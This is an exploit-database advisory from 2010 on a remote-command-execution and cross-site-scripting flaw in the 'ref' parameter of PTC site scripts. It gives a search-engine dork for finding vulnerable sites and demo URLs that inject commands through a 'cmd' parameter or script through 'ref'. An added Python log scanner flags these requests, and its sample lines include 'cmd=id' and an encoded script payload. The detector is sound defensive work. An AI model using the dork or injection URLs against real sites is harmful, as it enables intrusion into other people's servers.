PTC Site's RCE/XSS Vulnerability



EDB-ID: 12808 CVE: N/A OSVDB-ID: N/A
Author: CrazyMember Published: 2010-05-30 Verified: Verified
Vulnerable App: N/A

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info and others :D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Command]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
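
Added example (not part of the original advisory): a log check for the request shape reported above, flagging help-page requests whose ref value is not a plain referral handle or that carry a cmd parameter. It assumes combined-format access logs, that legitimate ref values are short alphanumeric handles like the advisory's `marykarma`, and that the help page does not normally take a cmd parameter; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate referral name is a short alphanumeric handle.
SAFE_REF = re.compile(r"[A-Za-z0-9_.-]{1,32}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/May/2010:10:00:01 +0000] '
    '"GET /index.php?view=help&faq=1&ref=marykarma HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/May/2010:10:00:07 +0000] '
    '"GET /index.php?view=help&faq=1&ref=marykarma&cmd=id HTTP/1.1" 200 5344',
    '203.0.113.9 - - [30/May/2010:10:00:09 +0000] '
    '"GET /index.php?view=help&faq=1&ref=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
    ' HTTP/1.1" 200 5201',
    '198.51.100.2 - - [30/May/2010:10:01:00 +0000] '
    '"GET /index.php?view=home HTTP/1.1" 200 900',
]

def classify(log_line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # parse_qs percent-decodes values, so encoded markup is seen in clear.
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/index.php") or params.get("view") != ["help"]:
        return []  # only the help view named in the advisory is in scope
    findings = []
    refs = params.get("ref", [])
    if any(not SAFE_REF.fullmatch(r) for r in refs):
        findings.append("ref-not-a-handle")
    if len(refs) > 1:
        findings.append("duplicate-ref")
    if "cmd" in params:
        findings.append("unexpected-cmd-parameter")
    return findings

def scan(lines):
    """Return (line_number, findings) for every flagged line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, f) for n, f in hits if f]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(n, ", ".join(f))
```

A hit on the pattern only shows that the request was made; whether the host is affected still has to be checked against the application's handling of ref.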